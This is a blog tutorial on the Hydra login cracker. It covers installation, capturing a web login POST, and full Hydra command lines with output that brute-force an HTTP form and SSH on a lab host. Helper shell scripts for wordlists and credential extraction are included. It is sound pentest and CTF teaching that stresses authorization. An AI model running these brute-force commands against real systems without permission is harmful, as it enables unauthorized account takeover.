In this latest post in our series on Core Tools to Know, I want to talk about Hydra. Hydra is a login cracker that you can use to test your own password strength and lockout policies or as part of your toolkit if you are doing penetration tests or capture the flag events. We’re going to take a look at what Hydra is and give some examples of how you’d use it.

Specifically, Hydra is an open-source network login cracker that performs dictionary-based or brute-force attacks against logins to determine valid credentials. It supports over 50 protocols and services, including stalwarts like HTTP, FTP, SMTP, SSH, RDP, and MySQL. It is optimized for speed and runs many attempts in parallel to speed up the attacks. It also has a ton of parameters and customizations so that you can get it to do exactly what you want. Because of that, this is only going to be the most entry-est of entry-level tutorials, hopefully enough to expose you to the tool and cause you to dig deeper.

I want to note that Hydra should only be used ethically and with proper authorization (I’m not responsible if you do dumb stuff… I’m also specifically telling you NOT to do illegal stuff).

If you’re using Kali or Parrot OS, Hydra is already in place. If not, you can install it with your favorite package manager. On Debian-based systems, it is usually as simple as this:

sudo apt install hydra

Or if you’re so inclined, you can clone the source code from its GitHub repository and compile it manually:

git clone https://github.com/vanhauser-thc/thc-hydra.git && cd thc-hydra && ./configure && make && sudo make install

Or, you can run it in Docker. This is *probably* the best solution if you want to run it on Windows, though I’d recommend either a Kali VM or even Windows Subsystem for Linux (WSL2) instead, but you do you.

docker pull vanhauser/hydra

So, in order to get started, you need to know the following information:

- Target Information: The IP address or hostname of the service you’re attacking.

- Username(s): A single username or a list of potential usernames.

- Password List: A wordlist containing potential passwords.

- Protocol: The service or protocol to attack (e.g., ssh, ftp, http).

That might seem like a lot, but in reality you are going to know the IP/hostname because – if not – what are we even doing? You’ll have some password lists you like and have curated or you’ll have some you may have made for this purpose if you’re targeting someone specific. The protocol will just be what thing you’re attempting at each step (you will probably go after several during the event), and the usernames will come from research and open-source intelligence (OSINT).
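Curating a password list can be as simple as filtering a big list down to what the target could plausibly accept. Here is a minimal sketch of that idea. The 8-character minimum is an assumed password policy, and the sample file is a tiny stand-in for a real list like rockyou.txt, so treat both as placeholders.

```shell
# Sketch: trim a wordlist to candidates that fit a known password policy.
# The minimum length and the sample entries are assumptions for illustration.
filter_wordlist() {
  local src="$1" min_len="$2"
  # Keep entries of at least min_len characters and drop repeats,
  # preserving the original order of the list
  awk -v min="$min_len" 'length($0) >= min && !seen[$0]++' "$src"
}

workdir=$(mktemp -d)

# Tiny stand-in for a real wordlist
printf '%s\n' 123456 password sunshine butterfly password iloveyou > "$workdir/sample.txt"

filter_wordlist "$workdir/sample.txt" 8 > "$workdir/targeted.txt"
cat "$workdir/targeted.txt"
```

The filter keeps the original order on purpose: if the source list puts likelier passwords first, the trimmed list should too. The resulting file is what you would hand to -P.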



Let’s start with something easy like a web login form. The first thing we want to do is attempt a login with something basic like admin:admin as the credentials. There is a small chance it will work, but what we really want is to catch how and where the form is posted. So, go to the page, open up the developer tools in the browser (Ctrl-Shift-I in Chrome, Firefox, and Edge), and go to the Network tab. Then, with the Network tab selected, submit the form. You will (most likely) see a POST happen, either to a page or to an API. Right-click that request and choose Copy Value -> Copy as cURL, as shown here. You can also see the payload if you click the network call, select the request to the side, and make sure it is toggled to show the raw text that was sent instead of a more user-friendly version that doesn’t show the payload.

In this case, here is what I got:

curl 'http://10.10.144.63/login' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://10.10.144.63' -H 'Connection: keep-alive' -H 'Referer: http://10.10.144.63/login' -H 'Cookie: connect.sid=s%3AsYxyPzJA9NW7oZOMmvPElmkqGwB2HGOJ.1PSvC1Y6eppA%2Fm0O7LXyG%2B%2B%2B0y4Ky0sx5IdFD%2F8ICEg' -H 'Upgrade-Insecure-Requests: 1' -H 'Priority: u=0, i' --data-raw 'username=admin&password=admin'

What we really need is just this part: ‘username=admin&password=admin’. However, this also tells us what URL was posted to (in this case the host and then /login) and includes any other headers we might need, just in case. Most of this you can ignore, though. It is also important to note that after my login failed, the message “Your username or password is incorrect.” appeared on the screen. We need to know what changes on the page after a failed login so that we can tell Hydra how to tell a good login from a bad one.
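Before building an attack around a failure message, it is worth confirming that the word you plan to key on shows up in a failed response and not in a successful one. This is a rough sketch of that check using plain grep. Both response bodies are made up for illustration; in practice you would save the real responses from the browser or curl.

```shell
# Sketch: check that a failure marker appears in a failed-login response
# and is absent from a successful one. Both sample bodies are hypothetical.
has_failure_marker() {
  local marker="$1" body="$2"
  # -q: no output, just an exit status; -F: treat the marker as a literal string
  printf '%s' "$body" | grep -qF -- "$marker"
}

failed_body='<p class="error">Your username or password is incorrect.</p>'
success_body='<h1>Welcome back, molly</h1>'

if has_failure_marker "incorrect" "$failed_body"; then
  echo "failed login: marker present"
fi

if ! has_failure_marker "incorrect" "$success_body"; then
  echo "successful login: marker absent"
fi
```

If the marker also appears on the page you land on after a good login, every attempt will look like a failure, so pick a word that is unique to the error message.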

So, let’s take this and make a Hydra attack. In this case, pretend we already know we’re attacking a user named molly. We’re going to use the rockyou.txt list and we know this was an HTTP POST. The flags for Hydra are case sensitive, so here is what we’ve got:

- -l means you are providing 1 user name and -L would be if you were passing a list. In this case, we know the user (molly), so we’re doing -l molly

- -p would be to pass one password and -P is to pass a list. In this case, we’re passing in the entire rockyou.txt file, so we’re doing -P /usr/share/wordlists/rockyou.txt

- Next is the IP or host that we’re attacking. This doesn’t need a flag and is just the host/IP. In our case, 10.10.144.63

- Then http-post-form tells it to do a POST. This is another unflagged parameter, but we could also specify something like http-get if that’s what the page was doing. But, since it is doing a standard HTTP POST, we include http-post-form

- What comes next is a colon-delimited string that has 3 parts:

    - First, what route to hit. In this case it is /login, then the colon.

    - Next, what data to send. That is the username=admin&password=admin part we captured above. We just have to swap out with placeholders of ^USER^ where we want the username to go and ^PASS^ where we want the password to go, so Hydra knows what to fill where on each attempt. Then, another colon.

    - Lastly, F=incorrect is to explain what a failure response looks like. In this case, we’re telling it to look for the presence of the word “incorrect” somewhere in the response body. You would change this to represent whatever the message looks like in your case.

- Finally, -V calls for it to be verbose and just show every attempt on the screen. Normally, you may not want to do that since password attempts can be millions of lines long, but I included it here for the teaching aspect.

# hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.144.63 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-29 16:42:12
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-post-form://10.10.144.63:80/login:username=^USER^&password=^PASS^:F=incorrect
[ATTEMPT] target 10.10.144.63 - login "molly" - pass "123456" - 1 of 14344398 [child 0] (0/0)
[ATTEMPT] target 10.10.144.63 - login "molly" - pass "12345" - 2 of 14344398 [child 1] (0/0)
[ATTEMPT] target 10.10.144.63 - login "molly" - pass "123456789" - 3 of 14344398 [child 2] (0/0)
[ATTEMPT] target 10.10.144.63 - login "molly" - pass "password" - 4 of 14344398 [child 3] (0/0)
[ATTEMPT] target 10.10.144.63 - login "molly" - pass "iloveyou" - 5 of 14344398 [child 4] (0/0)
[ATTEMPT] target 10.10.144.63 - login "molly" - pass "princess" - 6 of 14344398 [child 5] (0/0)
// S N I P T O S A V E S P A C E
[ATTEMPT] target 10.10.144.63 - login "molly" - pass "superman" - 49 of 14344398 [child 12] (0/0)
[80][http-post-form] host: 10.10.144.63 login: molly password: sunshine
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-29 16:42:24

You can see that it did 50 attempts in 12 seconds and found the password of “sunshine”. Almost too easy.
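If you’d rather not hand-edit the captured body, the three-part string can be assembled mechanically. Here is a small sketch of that. The helper name build_form_spec is my own invention, and the field names (username, password) are the ones from this particular form, so yours will likely differ.

```shell
# Sketch: turn a captured form body into the colon-delimited string
# that http-post-form expects. build_form_spec is a hypothetical helper.
build_form_spec() {
  local path="$1" body="$2" user_field="$3" pass_field="$4" fail_marker="$5"
  local template
  # Swap the captured values for the ^USER^ and ^PASS^ placeholders,
  # leaving any other fields in the body untouched
  template=$(printf '%s' "$body" | sed -E \
    -e "s/(^|&)(${user_field})=[^&]*/\1\2=^USER^/" \
    -e "s/(^|&)(${pass_field})=[^&]*/\1\2=^PASS^/")
  printf '%s:%s:F=%s\n' "$path" "$template" "$fail_marker"
}

build_form_spec "/login" "username=admin&password=admin" username password incorrect
```

The output is the same quoted string used in the command above, ready to paste after http-post-form. Extra fields in the body pass through unchanged, which is handy when a form sends more than just a username and password.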

Let’s take a look at SSH brute forcing. It works almost the same way, but instead of passing the bare IP along with a path and an HTTP verb, we pass the host as ssh://{HOST}. -l and -P are the same as before. I didn’t include -V this time, so we just see that it found “butterfly” as the password in six seconds on an underpowered VM.

# hydra -l molly -P /usr/share/wordlists/rockyou.txt ssh://10.10.144.63
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-29 16:44:00
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://10.10.144.63:22/
[22][ssh] host: 10.10.144.63 login: molly password: butterfly
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-29 16:44:06
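When you run without -V, or with it and millions of lines scroll by, it can help to pull just the hits out of the output. This is a rough sketch that assumes the success line keeps the "host: ... login: ... password: ..." layout seen above. The sample text is copied from that run, and extract_credentials is a name I made up.

```shell
# Sketch: pull host, login, and password out of Hydra's success lines.
# Assumes the "host: ... login: ... password: ..." layout from the run above.
extract_credentials() {
  awk '/host: .* login: .* password: / {
    for (i = 1; i < NF; i++) {
      if ($i == "host:") host = $(i + 1)
      if ($i == "login:") login = $(i + 1)
      if ($i == "password:") pass = $(i + 1)
    }
    # One tab-separated record per hit
    print host "\t" login "\t" pass
  }'
}

sample_output='[DATA] attacking ssh://10.10.144.63:22/
[22][ssh] host: 10.10.144.63 login: molly password: butterfly
1 of 1 target successfully completed, 1 valid password found'

printf '%s\n' "$sample_output" | extract_credentials
```

Because awk splits on whitespace, a password containing spaces would be cut off at the first space, so treat this as a quick triage helper. Hydra also has a -o option for writing found pairs to a file, which is the sturdier route for anything you need to keep.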

You can do so much more with Hydra, including many more protocols, routing through proxies, etc. With just a simple one-line command, you can easily brute force your way through lots of potential login scenarios. However, just make sure of the following:

- Get Authorization: Always ensure you have explicit permission to test a target.

- Use Appropriate Wordlists: Tailor your wordlists to the target environment.

- Monitor Your Activity: Excessive requests can trigger account lockouts or detection systems. Whether the test is internal or external, you don’t want to lock out accounts without explicit permission.

- Respect Legal Boundaries: Unauthorized usage of Hydra can result in severe legal consequences. (Have I mentioned that enough yet?)
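On the monitoring point, it helps to have a feel for how much traffic a full wordlist run implies. Here is a back-of-the-envelope sketch using the numbers from the web form example: 14344398 total tries and roughly 50 attempts in 12 seconds. That rate comes from one run on one VM, so it is only an assumption for the estimate.

```shell
# Sketch: rough duration of a full wordlist run at an observed rate.
# The 50-attempts-in-12-seconds rate is from a single run; real rates vary.
estimate_seconds() {
  local total_tries="$1" sample_tries="$2" sample_seconds="$3"
  # Integer arithmetic is plenty for a ballpark figure
  echo $(( total_tries * sample_seconds / sample_tries ))
}

total=14344398   # login tries Hydra reported for rockyou.txt
seconds=$(estimate_seconds "$total" 50 12)
echo "about $(( seconds / 86400 )) days for $total requests"
```

At that pace the full list would take over a month and send more than 14 million login requests at one account, which is exactly the kind of activity that trips lockouts and alerts. That is a good argument for short, targeted wordlists.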

That’s it! Hydra is a cornerstone tool for capture the flag enthusiasts, penetration testers, and security researchers. By understanding its functionality and practicing ethical usage, you can harness its capabilities to improve security postures. Have fun.

As all bloggers eventually find out, two of the best reasons to write blog posts are either to document something for yourself for later or to force yourself to learn something well enough to explain it to others. That’s the impetus of this series that I plan on doing from time to time. I want to get more familiar with some of these core tools and also have a reference / resource available that is in “Pete Think” so I can quickly find what I need to use these tools if I forget.
